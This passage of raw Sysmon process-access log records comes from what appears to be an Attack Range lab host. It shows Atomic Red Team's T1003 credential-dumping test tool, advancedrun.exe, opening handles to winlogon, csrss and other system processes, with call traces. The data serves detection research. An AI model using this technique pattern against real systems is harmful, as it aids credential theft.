Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003953060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003953059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590